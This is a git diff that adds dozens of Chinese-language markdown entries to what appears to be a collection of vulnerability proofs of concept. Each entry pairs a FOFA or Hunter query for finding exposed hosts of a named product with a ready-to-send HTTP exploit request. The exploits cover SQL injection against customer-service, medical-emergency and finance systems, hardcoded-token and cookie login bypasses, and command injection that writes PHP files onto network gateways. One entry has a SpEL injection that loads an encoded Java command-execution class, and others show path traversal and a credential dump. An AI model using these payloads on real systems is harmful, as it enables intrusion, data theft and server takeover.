+![1728882649323-7a5fedf2-fef6-49d3-a859-9f09ab4ab279.png](./img/_w2Gyv2xSYRBrMgJ/1728882649323-7a5fedf2-fef6-49d3-a859-9f09ab4ab279-976058.png)
+
+
+
+> 更新: 2024-10-21 11:49:37  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fq1csz1qt7nm1lgc>
\ No newline at end of file
diff --git a/点企来客服系统getwaitnum存在sql注入漏洞.md b/点企来客服系统getwaitnum存在sql注入漏洞.md
new file mode 100644
index 0000000..96b8952
--- /dev/null
+++ b/点企来客服系统getwaitnum存在sql注入漏洞.md
@@ -0,0 +1,32 @@
+# 点企来客服系统getwaitnum存在sql注入漏洞
+
+点企来客服系统getwaitnum存在sql注入漏洞，攻击者未经授权可以访问数据库中的数据，盗取用户的隐私以及个人信息，造成用户的信息泄露。
+
+## fofa
+
+```yaml
+body="layui-form-item" && body="/admin/login/check.html"
+```
+
+## poc
+
+```java
+POST /admin/event/getwaitnum HTTP/2
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Connection: keep-alive
+Content-Length: 84
+Content-Type: application/x-www-form-urlencoded
+X-Requested-With: XMLHttpRequest
+Accept-Encoding: gzip, deflate, br
+
+business_id[]=exp&business_id[]=+and+updatexml(1,concat(0x7e,md5(0x5c)),1)&groupid=1
+```
+
+![image-20240823213038237](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408232130305.png)
+
+
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/unbf6JO5U9OAqdVq8YFbuQ
\ No newline at end of file
diff --git a/点企来客服系统存在硬编码漏洞.md b/点企来客服系统存在硬编码漏洞.md
new file mode 100644
index 0000000..dac0623
--- /dev/null
+++ b/点企来客服系统存在硬编码漏洞.md
@@ -0,0 +1,27 @@
+# 点企来客服系统存在硬编码漏洞
+
+点企来客服系统存在硬编码漏洞，攻击者利用此漏洞可直接进入应用系统或者管理系统，从而进行系统、网页、数据的篡改与删除，非法获取系统、用户的数据，甚至可能导致服务器沦陷。
+
+## fofa
+
+```yaml
+body="layui-form-item" && body="/admin/login/check.html"
+```
+
+## poc
+
+```javascript
+GET /admin/custom/index.html HTTP/1.1
+Host: 
+Cookie: service_token=OuwfoovK%2BIdd
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+X-Requested-With: XMLHttpRequest
+```
+
+![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409261034762.png)
+
+
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/AeXSpX7Jrfkp8B1PjUHX-g
\ No newline at end of file
diff --git a/热网无线监测系统GetMenuItem存在SQL注入漏洞.md b/热网无线监测系统GetMenuItem存在SQL注入漏洞.md
new file mode 100644
index 0000000..f0596ac
--- /dev/null
+++ b/热网无线监测系统GetMenuItem存在SQL注入漏洞.md
@@ -0,0 +1,23 @@
+## 热网无线监测系统GetMenuItem存在SQL注入漏洞
+
+热网无线监测系统 GetMenuItem 接口处存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
+
+## fofa
+
+```yaml
+body="Downloads/HDPrintInstall.rar" || body="skins/login/images/btn_login.jpg"
+```
+
+## poc
+
+```javascript
+POST /DataSrvs/UCCGSrv.asmx/GetMenuItem HTTP/1.1
+Host: 
+accept: */*
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+ 
+name=1') waitfor delay '0:0:5'-- +
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409081939869.png)
\ No newline at end of file
diff --git a/爱数AnyShare智能内容管理平台Usrm_GetAllUsers信息泄露漏洞.md b/爱数AnyShare智能内容管理平台Usrm_GetAllUsers信息泄露漏洞.md
new file mode 100644
index 0000000..d6cee39
--- /dev/null
+++ b/爱数AnyShare智能内容管理平台Usrm_GetAllUsers信息泄露漏洞.md
@@ -0,0 +1,25 @@
+# 爱数AnyShare智能内容管理平台Usrm_GetAllUsers信息泄露漏洞
+
+爱数 AnyShare智能内容管理平台 Usrm_GetAllUsers 接口存在信息泄露漏洞，未经身份认证的攻击者可获取用户名密码等敏感信息。可登录后台，使系统处于极不安全状态。
+
+## fofa
+
+```javascript
+app="AISHU-AnyShare"
+```
+
+## poc
+
+```javascript
+OST /api/ShareMgnt/Usrm_GetAllUsers HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+
+[1,100]
+```
+
+![image-20241108205715836](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411082057919.png)
\ No newline at end of file
diff --git a/爱数企业云盘存在信息泄露漏洞.md b/爱数企业云盘存在信息泄露漏洞.md
new file mode 100644
index 0000000..dcd4c28
--- /dev/null
+++ b/爱数企业云盘存在信息泄露漏洞.md
@@ -0,0 +1,32 @@
+# 爱数企业云盘存在信息泄露漏洞
+
+# 一、漏洞简介
+爱数企业云盘是一个备受欢迎的企业级云存储解决方案，其主要特点包括1、数据安全性高，2、存储容量大，3、访问便捷。爱数企业云盘通过多重加密和权限控制，保障了企业数据的安全性。其大容量存储可以满足企业大量数据存储需求，并且用户可以通过多种设备便捷访问数据。爱数企业云盘存在任意信息泄露漏洞
+
+# 二、影响版本
+爱数企业云盘
+
+# 三、资产测绘
++ fofa`app="AISHU-AnyShare"`
++ 特征
+
+![1730710857097-161efd6a-0577-47d8-a3d6-a82d1634dc19.png](./img/nfcJYEdXCi3NMsDs/1730710857097-161efd6a-0577-47d8-a3d6-a82d1634dc19-105570.png)
+
+# 三、漏洞复现
+```java
+POST /api/ShareMgnt/Usrm_GetAllUsers HTTP/1.1
+Host: 
+
+[1,100]
+```
+
+![1730710998770-27410fe5-6d05-4d12-8c3b-080e4dc815ac.png](./img/nfcJYEdXCi3NMsDs/1730710998770-27410fe5-6d05-4d12-8c3b-080e4dc815ac-017381.png)
+
+使用账号密码登录
+
+![1730710969054-6267588d-2c93-466a-a855-f31713dfc801.png](./img/nfcJYEdXCi3NMsDs/1730710969054-6267588d-2c93-466a-a855-f31713dfc801-355450.png)
+
+
+
+> 更新: 2024-11-27 10:00:07  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/lw5f2lpcye0l5ez8>
\ No newline at end of file
diff --git a/珠海市安克电子技术有限公司医疗急救管理系统存在SQL注入漏洞.md b/珠海市安克电子技术有限公司医疗急救管理系统存在SQL注入漏洞.md
new file mode 100644
index 0000000..b61cc5b
--- /dev/null
+++ b/珠海市安克电子技术有限公司医疗急救管理系统存在SQL注入漏洞.md
@@ -0,0 +1,39 @@
+# 珠海市安克电子技术有限公司医疗急救管理系统存在SQL注入漏洞
+珠海市安克电子技术有限公司成立于1992年，专业从事急救信息化系统集成与软件开发，是国内领先的院前急救信息系统供应商。在北京、合肥、西安设有研发中心，在全国设有分支机构和服务网点20个，具有ISO9000等质量体系、高新技术企业、软件企业、信息系统集成等多项认证资质<font style="color:rgb(102, 102, 102);">，</font>珠海市安克电子技术有限公司医疗急救管理系统存在SQL注入漏洞。
+
+## fofa
+```javascript
+fid="v6Cd4x0Px/YZrVqV3jQ3xQ=="
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/21711125/1730787843764-4e1b3e61-0356-40a1-8d4e-f1bd5d92cf5a.png)
+
+## poc
+```java
+POST /api/Service.asmx HTTP/1.1
+X-Requested-With: XMLHttpRequest
+Cookie: ASP.NET_SessionId=exrktu3aplxg004tcc2ntnuw; FailCount=5; ASPSESSIONIDSSDTSCDA=OLGBFHMCDJBLGKGENPLEECCO
+SOAPAction: http://tempuri.org/GetAmbulance
+Content-Type: text/xml
+Content-Length: 296
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Encoding: gzip,deflate,br
+User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)
+Host: 
+Connection: Keep-alive
+
+<?xml version="1.0"?>
+<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tns="http://tempuri.org/">
+	<soap:Header />
+	<soap:Body>
+		<tns:GetAmbulance>
+			<tns:CNumber>11' AND 6537 IN (SELECT (CHAR(113)+CHAR(106)+CHAR(98)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (6537=6537) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(113)))-- ntgj</tns:CNumber>
+		</tns:GetAmbulance>
+	</soap:Body>
+</soap:Envelope>
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1731332070574-8670e58d-e01a-42eb-a55c-c5afe4928fdc.png)
+
+
+
diff --git a/珠海新华通软件股份有限公司云平台存在登录绕过漏洞.md b/珠海新华通软件股份有限公司云平台存在登录绕过漏洞.md
new file mode 100644
index 0000000..b6eeda8
--- /dev/null
+++ b/珠海新华通软件股份有限公司云平台存在登录绕过漏洞.md
@@ -0,0 +1,29 @@
+# 珠海新华通软件股份有限公司云平台存在登录绕过漏洞
+
+珠海新华通软件股份有限公司云平台存在登录绕过漏洞，漏洞允许攻击者通过简单操作，如添加特定Cookie或修改请求参数，绕过身份验证直接访问后台，从而对系统安全构成严重威胁。
+
+## fofa
+
+```javascript
+icon_hash="513304261"
+```
+
+## POC
+
+```javascript
+POST /Main/Desktop/Default.aspx HTTP/1.1
+Accept: */*
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: keep-alive
+Content-Length: 166
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Cookie: ASP.NET_SessionId=x01ftldfm5dwbbo1tx1ne1kv; #_SSO_Login_UserID=admin; #_SSO_Login_UserID_Guid=
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
+X-Requested-With: XMLHttpRequest
+```
+
+请求/Main/Desktop/Default.aspx  加cookie认证`#_SSO_Login_UserID=admin `  即可绕过登录进入后台
+
+![image-20240831234213408](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408312342494.png)
\ No newline at end of file
diff --git a/瑞友天翼应用虚拟化系统GetPwdPolicy存在SQL注入漏洞.md b/瑞友天翼应用虚拟化系统GetPwdPolicy存在SQL注入漏洞.md
new file mode 100644
index 0000000..b6110d7
--- /dev/null
+++ b/瑞友天翼应用虚拟化系统GetPwdPolicy存在SQL注入漏洞.md
@@ -0,0 +1,21 @@
+# 瑞友天翼应用虚拟化系统GetPwdPolicy存在SQL注入漏洞
+
+瑞友天翼应用虚拟化系统GetPwdPolicy存在SQL注入漏洞
+
+## fofa
+
+```javascript
+app="REALOR-天翼应用虚拟化系统"
+```
+
+## poc
+
+```javascript
+GET /RAPAgent.XGI?CMD=GetPwdPolicy&User=1%27+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCONCAT%280x7e%2C%28SELECT+user()%29%2C0x7e%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--+- HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Connection: keep-alive
+```
+
diff --git a/瑞斯康达main.asp未授权访问漏洞.md b/瑞斯康达main.asp未授权访问漏洞.md
new file mode 100644
index 0000000..b3af35f
--- /dev/null
+++ b/瑞斯康达main.asp未授权访问漏洞.md
@@ -0,0 +1,23 @@
+# 瑞斯康达main.asp未授权访问漏洞
+
+瑞斯康达 wireless main.asp 存在未授权访问漏洞。
+
+## fofa
+
+```javascript
+banner="Server: INP httpd" || header="Server: INP httpd"
+```
+
+## poc
+
+```javascript
+GET /main.asp HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Ge  cko/20100101 Firefox/56.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Cookie: sessionid=admin
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+```
+
+![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410290944091.webp)
\ No newline at end of file
diff --git a/瑞斯康达多业务智能网关list_base_config存在远程命令执行漏洞.md b/瑞斯康达多业务智能网关list_base_config存在远程命令执行漏洞.md
new file mode 100644
index 0000000..2618133
--- /dev/null
+++ b/瑞斯康达多业务智能网关list_base_config存在远程命令执行漏洞.md
@@ -0,0 +1,37 @@
+# 瑞斯康达多业务智能网关list_base_config存在远程命令执行漏洞
+
+# 一、漏洞简介
+瑞斯康达多业务智能网关是一款集多种功能于一体的网络设备，专为中小企业及行业分支机构设计，以满足其多业务接入和带宽提速的需求，如MSG2100E系列、MSG2300系列等，是瑞斯康达科技发展股份有限公司推出的新一代网络产品。这些网关集成了数据、语音、安全、无线等多种功能，能够为用户提供综合、完整的网络接入解决方案。它们广泛应用于政企单位、商务楼宇、校园、工业园区等场景，为用户带来高效、便捷的网络体验。瑞斯康达-多业务智能网关 list_base_config.php 存在远程命令执行漏洞，未经身份验证的远程攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
+
+# 二、影响版本
++ 瑞斯康达多业务智能网关
+
+# 三、资产测绘
++ fofa`body="/images/raisecom/back.gif" && title=="Web user login"`
++ 特征
+
+![1722216563849-bac29c1c-6bcf-4634-8051-d96acefe908e.png](./img/jEltp2OV3_wK85dl/1722216563849-bac29c1c-6bcf-4634-8051-d96acefe908e-196339.png)
+
+# 四、漏洞复现
+```plain
+GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo+-e+%27%3C%3Fphp+phpinfo%28%29%3Bunlink%28__FILE__%29%3B%3F%3E%27%3E%2Fwww%2Ftmp%2Ftest.php%60 HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br
+Connection: close
+```
+
+![1722216633171-d33a04cb-0e0c-4a38-b59b-caf1c7f1a753.png](./img/jEltp2OV3_wK85dl/1722216633171-d33a04cb-0e0c-4a38-b59b-caf1c7f1a753-243264.png)
+
+```plain
+/tmp/test.php
+```
+
+![1722216618489-31d51d65-a8f3-4f28-b081-ffb6c09b68c5.png](./img/jEltp2OV3_wK85dl/1722216618489-31d51d65-a8f3-4f28-b081-ffb6c09b68c5-111231.png)
+
+
+
+> 更新: 2024-08-12 17:48:53  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/yrdl3xmt2n3qpy2e>
\ No newline at end of file
diff --git a/瑞斯康达多业务智能网关list_service_manage.php存在未授权命令注入漏洞.md b/瑞斯康达多业务智能网关list_service_manage.php存在未授权命令注入漏洞.md
new file mode 100644
index 0000000..c60a6a8
--- /dev/null
+++ b/瑞斯康达多业务智能网关list_service_manage.php存在未授权命令注入漏洞.md
@@ -0,0 +1,22 @@
+# 瑞斯康达多业务智能网关list_service_manage.php存在未授权命令注入漏洞
+
+瑞斯康达-多业务智能网关 list_service_manage.php 存在远程命令执行漏洞，未经身份验证的远程攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
+
+## fofa
+
+```yaml
+body="/images/raisecom/back.gif" && title=="Web user login"
+```
+
+## poc
+
+```java
+POST /vpn/list_service_manage.php?template=%60echo+-e+%27%3C%3Fphp+phpinfo%28%29%3B%3F%3E%27%3E%2Fwww%2Ftmp%2Finfo29.php%60 HTTP/1.1
+Host: 
+Content-Length: 111
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+
+Nradius_submit=true
+```
+
diff --git a/瑞格智慧心理服务平台NPreenSMSList.asmx存在sql注入漏洞.md b/瑞格智慧心理服务平台NPreenSMSList.asmx存在sql注入漏洞.md
new file mode 100644
index 0000000..3bc2a9b
--- /dev/null
+++ b/瑞格智慧心理服务平台NPreenSMSList.asmx存在sql注入漏洞.md
@@ -0,0 +1,30 @@
+# 瑞格智慧心理服务平台NPreenSMSList.asmx存在sql注入漏洞
+
+瑞格智慧心理服务平台NPreenSMSList.asmx存在sql注入漏洞，允许攻击者通过恶意构造的SQL语句操控数据库，从而导致数据泄露、篡改或破坏，严重威胁系统安全。
+
+## hunter
+
+```javascript
+web.body="瑞格智慧心理服务平台"
+```
+
+## poc
+
+```javascript
+POST /NPreenManage/NPreenSMSList.asmx HTTP/1.1
+Host: 
+Content-Type: text/xml; charset=utf-8
+Content-Length: length
+SOAPAction: "RuiGe.WebUi.NPreenSMS/Seach"
+
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+  <soap:Body>
+    <Seach xmlns="RuiGe.WebUi.NPreenSMS">
+      <sqlwhere>and 1=convert(int,user_name())</sqlwhere>
+    </Seach>
+  </soap:Body>
+</soap:Envelope>
+```
+
+![image-20241020214327143](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410202143216.png)
\ No newline at end of file
diff --git a/甄云SRM云平台SpEL表达式注入漏洞(XVE-2024-18301).md b/甄云SRM云平台SpEL表达式注入漏洞(XVE-2024-18301).md
new file mode 100644
index 0000000..ab828e5
--- /dev/null
+++ b/甄云SRM云平台SpEL表达式注入漏洞(XVE-2024-18301).md
@@ -0,0 +1,28 @@
+# 甄云SRM云平台SpEL表达式注入漏洞(XVE-2024-18301)
+
+甄云SRM平台存在SpEL表达式注入漏洞，该漏洞源于系统能够解析/oauth/public/后路径中的SpEL表达式，导致攻击者能够利用该漏洞执行任意代码。
+
+## fofa
+
+```javascript
+body="/oauth/static/default/css/footer.css"
+```
+
+## poc
+
+```javascript
+GET /oauth/public/%5f%5f%24%7bT(groovy.lang.GroovyClassLoader).newInstance().defineClass('CALC',T(com.sun.org.apache.xml.internal.security.utils.Base64).decode('yv66vgAAADQAqwoAJABOCgBPAFAHAFEKAAMAUgoAAwBTCwBUAFUIAD8LAFYAVwcAWAoAWQBaCgBbAFwKAAkAXQgAXgoAXwBgCgAJAGEIAGIKAAkAYwgAZAgAZQgAZggAZwoAaABpCgBoAGoKAGsAbAcAbQoAGQBuCABvCgAZAHAKABkAcQoAGQByCABzCgB0AHUKAHQAdgoAdAB3BwB4BwB5AQAGPGluaXQ%2bAQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEAB2lzTGludXgBAAFaAQAFb3NUeXABABJMamF2YS9sYW5nL1N0cmluZzsBAARjbWRzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAAmluAQAVTGphdmEvaW8vSW5wdXRTdHJlYW07AQABcwEAE0xqYXZhL3V0aWwvU2Nhbm5lcjsBAAZvdXRwdXQBAAR0aGlzAQAGTENBTEM7AQACc3IBAEJMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvY29udGV4dC9yZXF1ZXN0L1NlcnZsZXRSZXF1ZXN0QXR0cmlidXRlczsBAAdyZXF1ZXN0AQAnTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3Q7AQAIcmVzcG9uc2UBAChMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVzcG9uc2U7AQALcHJpbnRXcml0ZXIBABVMamF2YS9pby9QcmludFdyaXRlcjsBAAh1c2VybmFtZQEADVN0YWNrTWFwVGFibGUHAHgHAFEHAHoHAHsHAHwHAFgHAC8HAH0HAG0BAApFeGNlcHRpb25zBwB%2bAQAKU291cmNlRmlsZQEACUNBTEMuamF2YQwAJQAmBwBxxxxDACAAIEBAEBvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9jb250ZXh0L3JlcXVlc3QvU2VydmxldFJlcXVlc3RBdHRyaWJ1dGVzDACCAIMMAIQAhQcAewwAhgCHBwB6DACIAIkBABBqYXZhL2xhbmcvU3RyaW5nBwCKDACLAI4HAI8MAJAAkQwAJQCSAQAHb3MubmFtZQcAkwwAlACJDACVAJYBAAN3aW4MAJcAmAEAAnNoAQACLWMBAAdjbWQuZXhlAQACL2MHAJkMAJoAmwwAnACdBwCeDACfAKABABFqYXZhL3V0aWwvU2Nhbm5lcgwAJQChAQACXGEMAKIAowwApAClDACmAJYBAAAHAHwMAKcAqAwAqQAmDACqACYBAARDQUxDAQAQamF2YS9sYW5nL09iamVjdAEAJWphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3QBACZqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZQEAE2phdmEvaW8vUHJpbnRXcml0ZXIBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9pby9JT0V4Y2VwdGlvbgEAPG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2NvbnRleHQvcmVxdWVzdC9SZXF1ZXN0Q29udGV4dEhvbGRlcgEAFGdldFJlcXVlc3RBdHRyaWJ1dGVzAQA9KClMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvY29udGV4dC9yZXF1ZXN0L1JlcXVlc3RBdHRyaWJ1dGVzOwEACmdldFJlcXVlc3QBACkoKUxqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0OwEAC2dldFJlc3BvbnNlAQAqKClMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVzcG9uc2U7AQAJZ2V0V3JpdGVyAQAXKClMamF2YS9pby9QcmludFdyaXRlcjsBAAxnZXRQYXJhbWV0ZXIBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEAEGphdmEvdXRpbC9CYXNlNjQBAApnZXREZWNvZGVyAQAHRGVjb2RlcgEADElubmVyQ2xhc3NlcwEAHCgpTGphdmEvdXRpbC9CYXNlNjQkRGVjb2RlcjsBABhqYXZhL3V0aWwvQmFzZTY0JERlY29kZXIBAAZkZWNvZGUBABYoTGphdmEvbGFuZy9TdHJpbmc7KVtCAQAFKFtCKVYBABBqYXZhL2xhbmcvU3lzdGVtAQALZ2V0UHJvcGVydHkBAAt0b0xvd2VyQ2FzZQEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAIY29udGFpbnMBABsoTGphdmEvbGFuZy9DaGFyU2VxdWVuY2U7KVoBABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAoKFtMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwEAEWphdmEvbGFuZy9Qcm9jZXNzAQAOZ2V0SW5wdXRTdHJlYW0BABcoKUxqYXZhL2lvL0lucHV0U3RyZWFtOwEAGChMamF2YS9pby9JbnB1dFN0cmVhbTspVgEADHVzZURlbGltaXRlcgEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvdXRpbC9TY2FubmVyOwEAB2hhc05leHQBAAMoKVoBAARuZXh0AQAHcHJpbnRsbgEAFShMamF2YS9sYW5nL1N0cmluZzspVgEABWZsdXNoAQAFY2xvc2UAIQAjACQAAAAAAAEAAQAlACYAAgAnAAACGAAEAAwAAADZKrcAAbgAAsAAA0wrtgAETSu2AAVOLbkABgEAOgQsEge5AAgCADoFGQXGAKW7AAlZuAAKGQW2AAu3AAw6BQQ2BhINuAAOOgcZB8YAExkHtgAPEhC2ABGZAAYDNgYVBpkAGQa9AAlZAxISU1kEEhNTWQUZBVOnABYGvQAJWQMSFFNZBBIVU1kFGQVTOgi4ABYZCLYAF7YAGDoJuwAZWRkJtwAaEhu2ABw6ChkKtgAdmQALGQq2AB6nAAUSHzoLGQQZC7YAIBkEtgAhGQS2ACIZBLYAIRkEtgAisQAAAAMAKAAAAFoAFgAAAAwABAAOAAsADwAQABAAFQARAB0AEwAnABQALAAWAD0AGABAABkARwAaAFkAGwBcAB4AjAAfAJkAIACpACEAvQAiAMQAIwDJACQAzgAnANMAKADYACkAKQAAAHoADABAAI4AKgArAAYARwCHACwALQAHAIwAQgAuAC8ACACZADUAMAAxAAkAqQAlADIAMwAKAL0AEQA0AC0ACwAAANkANQA2AAAACwDOADcAOAABABAAyQA5ADoAAgAVAMQAOwA8AAMAHQC8AD0APgAEACcAsgAxxxxAC0ABQBAAAAATQAGxxxxwBcAAgHAEEHAEIHAEMHAEQHAEUHAEYBBwBGAAAaUgcARxxxx4ALgcARwcASAcASUEHAEbxxxxABIABgcAQQcAQgcAQwcARAcARQcARgAAAEoAAAAEAAEASwACAEwAAAACAE0AjQAAAAoAAQBbAFkAjAAJ'.replace('xxxx',new%20String(T(com.sun.org.apache.xml.internal.security.utils.Base64).decode('Lw=='))))).newInstance()-1%7d%5f%5f%3a%3a%78/ab?username=aWQ= HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410251404430.webp)
+
+
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s?__biz=MzkyNDY3MTY3MA==&mid=2247485822&idx=1&sn=d8c7be2cc93bee896585fe8e7a1fab40
\ No newline at end of file
diff --git a/生命港湾服务配置工具平台Download任意文件读取漏洞.md b/生命港湾服务配置工具平台Download任意文件读取漏洞.md
new file mode 100644
index 0000000..7a38fa4
--- /dev/null
+++ b/生命港湾服务配置工具平台Download任意文件读取漏洞.md
@@ -0,0 +1,24 @@
+# 生命港湾服务配置工具平台Download任意文件读取漏洞
+
+生命港湾服务配置工具平台 Download 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取配置文件等等，导致网站处于极度不安全状态。
+
+## fofa
+
+```javascript
+body="css/markdown.css" && body="icon-512.png"
+```
+
+## poc
+
+```javascript
+GET /api/File/Download?file=../web.config HTTP/1.1
+Host: 
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Priority: u=0, i
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
+Accept-Encoding: gzip, deflate
+Upgrade-Insecure-Requests: 1
+```
+
+![image-20241211213908431](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412112139490.png)
\ No newline at end of file
diff --git a/用友-GRP-U8-bx_historyDataCheck.jsp-SQL注入漏洞.md b/用友-GRP-U8-bx_historyDataCheck.jsp-SQL注入漏洞.md
new file mode 100644
index 0000000..4c88813
--- /dev/null
+++ b/用友-GRP-U8-bx_historyDataCheck.jsp-SQL注入漏洞.md
@@ -0,0 +1,15 @@
+## 用友 GRP-U8 bx_historyDataCheck.jsp SQL注入漏洞
+
+## fofa-qeury
+app="yonyou-GRP-U8"
+
+## POC
+```
+POST /u8qx/bx_historyDataCheck.jsp HTTP/1.1
+Host: 
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 53
+
+userName=';WAITFOR DELAY '0:0:5'--&ysnd=&historyFlag=
+```
diff --git a/用友-GRP-U8-license_check.jsp-存在SQL注入.md b/用友-GRP-U8-license_check.jsp-存在SQL注入.md
new file mode 100644
index 0000000..f3a9e9f
--- /dev/null
+++ b/用友-GRP-U8-license_check.jsp-存在SQL注入.md
@@ -0,0 +1,18 @@
+
+## 用友 GRP U8 license_check.jsp 存在SQL注入
+
+## sql注入payload
+```
+';WAITFOR DELAY '0:0:5'-- q
+```
+
+## poc
+```
+
+GET /u8qx/license_check.jsp?kjnd=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
+Connection: close
+```
+
